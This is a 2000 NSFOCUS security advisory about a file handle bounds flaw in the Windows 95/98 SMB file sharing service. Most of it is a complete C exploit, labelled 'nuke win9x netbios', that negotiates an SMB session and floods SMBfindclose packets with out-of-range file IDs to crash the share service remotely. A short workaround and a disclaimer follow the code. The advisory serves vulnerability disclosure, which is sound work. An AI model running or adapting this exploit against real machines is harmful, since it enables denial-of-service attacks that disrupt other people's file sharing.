[ SOURCE: http://www.secureroot.com/security/advisories/9735368887.html ]

NSFOCUS Security Advisory(SA2000-03)



Topic : Microsoft WIN9X Share Service File Handle Vulnerability



Release Date： July 10, 2000

Update Date：  Oct 11, 2000



Affected System:

=================

- Microsoft Windows 95

- Microsoft Windows 98

- Microsoft Windows 98 Second Edition



Non-affected System：

=====================

- Microsoft Windows NT

- Microsoft Windows 2000



Impact:

=========



NSFOCUS security team has found a security flaw in Microsoft Win9x file share

service.

Exploitation of this vulnerability , a malicious user can perform DoS attack of

file share service remotely.





Description:

=============



The share service program of WIN9X only assigns 0x400*4 bytes to store file

handle conversion pointers, so the file handle from client should be bounded to

0 - 0x3ff. But when share server handles some SMB commands like SMBfindclose

from client ,it does not perform file handles bound checking correctly .

Exploit of it ,server program will access illegal memory address. The share

service will halt after numerous repeats.





Exploit：

===============



#include <windows.h>

#include <winsock.h>

#include <stdio.h>

#include <string.h>





int main(int argc, char **argv)

{

char *server;

char buff[1000];

char buff2[1000];

char buffgetname[]=

{0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,

0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,

0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,

0x00,0x01};

char name;

char myname[0x200]={"hello"};

char servername[]={"*SMBSERVER"};

char buff3[]=

{0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,

0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,

0x43,0x41,0x43,0x41,00,0x20,0x45,0x48,0x46,0x46,0x45,0x46,0x46,0x44,0x46,0x45,

0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,

0x43,0x41,0x43,0x41,0x41,0x41,00

};

char buff4[]={

0x0,0x0,0x0,0x9a,0xff,0x53,0x4d,0x42,0x72,00,00, 00, 00, 00, 00, 00, 00, 00,

00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 ,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x77,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,

0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,0x4d,0x49,0x43,0x52,

0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,

0x2e,0x30,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,

0x32,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,

0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,

0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4e,

0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0

};

int fileid_begin=0x600;

int fileid_end=0x8ff;

char smbchr[]={"SMBr"};

char namereturn[]={0x82,0,0,0,0};

char ipaddr[]={"192.168.1.1"};

char ipaddrbak[]={"127.0.0.1"};



int port,gethost;

int fd,fd2;



struct sockaddr_in s_in,s_in2,s_in3;

struct linger time_out;

struct hostent *he;

int i,j,k;

SOCKET d_ip;

WSADATA wsaData;

int result= WSAStartup(MAKEWORD(1, 1), &wsaData);

if (result != 0) {

        fprintf(stderr, "Your computer was not connected "

            "to the Internet at the time that "

            "this program was launched, or you "

            "do not have a 32-bit "

            "connection to the Internet.");

        exit(1);

    }





if(argc <2)

{

WSACleanup( );

    fprintf(stderr,"\n nuke win9x netbios .\n copy by yuange(yuange@nsfocus.com) 2000.4.1. \n

                       wellcome to our homepage http://www.nsfocus.com .");

    fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]);

exit(1);

}

if(argc>=2)

server = argv[1];

else server=&ipaddr;

d_ip = inet_addr(server);



if(d_ip==-1){

he = gethostbyname(server);

if(!he)

{

WSACleanup( );

    printf("\n Can't get the ip of %s !\n",server);

exit(1);

    }

    else memcpy(&d_ip, he->h_addr, 4);



}

if(argc>2) port = atoi(argv[2]);

else port=139;



fd = socket(AF_INET, SOCK_STREAM,0);

i=8000;

setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));



s_in.sin_family = AF_INET;

s_in.sin_port = htons(port);

s_in.sin_addr.s_addr = d_ip;

printf("\n nuke ip: %s port %d",inet_ntoa(s_in.sin_addr),htons(s_in.sin_port));



if(!connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in))){



fd2 = socket(AF_INET, SOCK_DGRAM,0);

    i=8000;

    setsockopt(fd2,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));



s_in2.sin_family = AF_INET;

s_in2.sin_port = htons(500);

s_in2.sin_addr.s_addr =0;



    s_in3.sin_family = AF_INET;

s_in3.sin_port = htons(137);

s_in3.sin_addr.s_addr = d_ip;

    bind(fd2,&s_in2, sizeof(struct sockaddr_in));

for(k=0;k<10;++k){

        printf("\n connect the smb %d times",k+1);

sendto(fd2,buffgetname,0x32,0,&s_in3,sizeof(struct sockaddr_in));

        i= sizeof(struct sockaddr_in);



        for(i=0;i<520;++i) buff2[i]=0;

    j=recvfrom(fd2,buff2,500,0,&s_in3,&i);

        i=0x39;

        while(i<j){

            if(buff2[i+0x0f]==0x20) {

                memcpy(servername,buff2+i,0x40);

                break;

            }

            i+=0x12;

        }



        if(i>=j){

        he=gethostbyaddr(&d_ip,sizeof(d_ip),PF_INET);

    if(he) memcpy(servername,he->h_name,0x40);

        }

        printf("\n server computername: %s",servername);



    gethost=0;

    for(i=0;i<16;++i){

        name=servername[i] ;

        if(name==0) gethost=1;

        if(gethost==1) name=0x20;

        buff3[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';

        buff3[2*i+6]= (name & 0x000F) + 'A';

        }

    buff3[37]=0;

    gethost=0;

    for(i=0;i<16;++i){

            name=servername[i];

            if(name==0) gethost=1;

        if(gethost==1) name=0x20;

        buff3[2*i+39]= ( (name >> 4) & 0x000F ) + 'A';

        buff3[2*i+40]= (name & 0x000F) + 'A';



        }

    buff3[71]=0;



    i=send(fd,buff3,0x48,0);

    printf("\n send name packet %d bytes",i);

    buff2[0]=0;

    buff2[1]=0;

    buff2[2]=0;

    buff2[3]=0;

    buff2[4]=0;

    i=recv(fd,buff2,600,0);

    printf("\n recv :");

    if(i>0){

            for(j=0;j<i;++j) {

                name=(char * )buff2[j];

                printf("%d ",name);

            }

        }

        if(memcmp(buff2,namereturn,4)==0) k=100;

    }



    closesocket(fd2);

    if(k<100){

    printf("\n Can't Negative! \n");

closesocket(fd);

    WSACleanup( );

exit(1);

    }

    buff4[0]=0;

    buff4[1]=0;

    buff4[2]=0;

    buff4[3]=0x9a;

    buff4[4]=0xff;

    buff4[5]='S';

    buff4[6]='M';

    buff4[7]='B';

    buff4[8]=0x72;

    buff4[0x25]=0x77;

    j=send(fd,buff4,0x9e,0);

        printf("\n send smb 0x72 packet %d bytes",j);





        buff2[4]=0;

        buff2[5]=0;

        buff2[6]=0;

        j=recv(fd,buff2,600,0);

        printf("\n recv packet %d bytes:\n",j);

        if(strcmp(buff2+5,smbchr)!=0){

            printf("\n Can't login \\\\%s\\ipc$! \n",inet_ntoa(s_in.sin_addr));

        closesocket(fd);

        WSACleanup( );

        exit(1);

        }

        name=buff2[0x27];

        name&=0x01;

        if(name==1){

        printf("\n Only can nuke win9x system,can't nuke winnt system.\n");

        closesocket(fd);

        WSACleanup( );

        exit(1);

        }



        printf("\nBegin smb packet nuke !");



/* snd smb 0x73 packet */

for(i=0;i<400;++i) buff[i]=0;

    buff[0]=0;

    buff[1]=0;

    buff[2]=0;

    buff[3]=0x9e+strlen(servername);

    buff[4]=0xff;

    buff[5]='S';

    buff[6]='M';

    buff[7]='B';

    buff[8]=0x73;

    buff[0x24]=0x0d;

    buff[0x25]=0x75;

    buff[0x27]=0x86;

    buff[0x29]=0x68;

    buff[0x2a]=0x0b;

    buff[0x2b]=0x32;

    buff[0x33]=0x18;

    buff[0x3b]=0x05;

    buff[0x3f]=0x49;

    buff[0x59]=0x41;

    buff[0x5a]=0x44;

    buff[0x5b]=0x4d;

    buff[0x5c]=0x49;

    buff[0x5d]=0x4e;

    buff[0x4e]=0x49;

    buff[0x4f]=0x53;

    buff[0x50]=0x54;

    buff[0x51]=0x52;

    buff[0x52]=0x41;

    buff[0x53]=0x54;

    buff[0x54]=0x4f;

    buff[0x55]=0x52;



    buff[0x8a]=0x04;

    buff[0x8b]=0xff;

    buff[0x8f]=0x02;

    buff[0x91]=1;



    buff[0x93]=13+strlen(servername);

    buff[0x96]=0x5c;

    buff[0x97]=0x5c;



        strcpy(buff+0x98,servername);

        strcpy(buff+0x98+strlen(servername),"\\IPC$");

        strcpy(buff+0x9e+strlen(servername),"IPC");



        j=send(fd,buff,0xa2+strlen(servername),0);

        printf("\n send smb 0x73 packet %d bytes",j);



        j=recv(fd,buff2,600,0);

        printf("\n recv packet %d bytes",j);





/* send smb 0x34 packet */

    for(i=0;i<400;++i) buff[i]=0;

        buff[0]=0;

    buff[1]=0;

    buff[2]=0;

    buff[3]=0x25;

    buff[4]=0xff;

    buff[5]='S';

    buff[6]='M';

    buff[7]='B';

    buff[8]=0x34;

    buff[0x24]=0x01;

    for(i=fileid_begin;i<fileid_end;++i){

        buff[0x25]=i%0x100;

        buff[0x26]=i/0x100;

        j=send(fd,buff,0x29,0);

        printf("\n send smb 0x34 packet long %d",j);

            printf(" FileId: %d",i);

        }

}

else printf("\n connect err !\n");



closesocket(fd);

WSACleanup( );

return(0);

}



Workaround:

===========

Close Microsoft File and Print shared service.



Solution:

===========

Microsoft recommends disabling the File and Printer Sharing component when

Windows 9x client trys to connect to the Internet using Dial-Up Networking.



More info can be found at:

http://support.microsoft.com/support/kb/articles/Q199/3/46.ASP?LN=EN-US&SD=gn&FR=1



DISCLAIMS:

==========

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY

KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR

THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY

DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS

OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE

POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS

PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.



?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.





NSFOCUS Security Team <security@nsfocus.com>

NSFOCUS INFORMATION TECHNOLOGY CO.,LTD

(http://www.nsfocus.com)